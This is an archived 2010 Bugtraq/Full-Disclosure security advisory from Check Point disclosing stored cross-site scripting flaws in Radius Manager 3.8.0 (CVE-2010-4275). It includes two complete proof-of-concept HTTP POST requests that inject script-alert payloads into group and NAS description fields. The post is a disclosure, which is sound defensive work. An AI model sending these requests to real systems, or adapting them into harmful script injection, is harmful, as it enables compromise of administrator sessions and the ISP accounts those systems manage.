lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <50D13E31158CB84E8421A703294682FB1421D288E6@USEXCHANGE.ad.checkpoint.com>
Date: Fri, 17 Dec 2010 09:51:46 -0800
From: Rodrigo Branco <rbranco@...ckpoint.com>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
	"full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Radius Manager Multiple Cross Site Scripting
 (XSS) Vulnerabilities - CVE-2010-4275

Dear List,

I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability.



Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/

Radius Manager Multiple Cross Site Scripting Issues
CVE-2010-4275


INTRODUCTION

Radius Manager is a centralized way for administration of Mikrotik, Cisco, Chillispot and StarOS routers and wireless access points.  It has
a centralized accounting system that uses Radius, provinding easy user and accounting management for ISP's.

This problem was confirmed in the following versions of the Radius Manager, other versions maybe also affected.

Radius Manager 3.8.0


CVSS Scoring System

The CVSS score is: 6.4
	Base Score: 6.7
	Temporal Score: 6.4
We used the following values to calculate the scores:
	Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N
	Temporal score is: E:F/RL:U/RC:C


DETAILS

The Radius Manager system is affected by Multiple Stored Cross Site Scripting.  The “Group Name” and “Description” in “new_usergroup” menu do not 
sanitize input data, allowing attacker to store malicious javascript code in a page.

The same thing occurs with “new_nas” menu

Request:
http://<server>/admin.php?cont=update_usergroup&id=1
POST /admin.php?cont=update_usergroup&id=1 HTTP/1.1
Host: <server>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914
Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://<server>/admin.php?cont=edit_usergroup&id=1
Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; 
listusers_ordertype=DESC; listusers_lastorder=username
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Update

Request 2:
http://<serveR>/admin.php?cont=store_nas
POST /admin.php?cont=store_nas HTTP/1.1
Host: <server>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914
Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://<server>/admin.php?cont=new_nas
Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; 
listusers_ordertype=DESC; listusers_lastorder=username
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
name=Name&nasip=10.0.0.1&type=0&secret=1111&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Add+NAS



CREDITS

This vulnerability has been brought to our attention by Ulisses Castro from Conviso IT Security company (http://www.conviso.com.br) and researched 
internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT).



Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies
http://www.checkpoint.com/defense
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ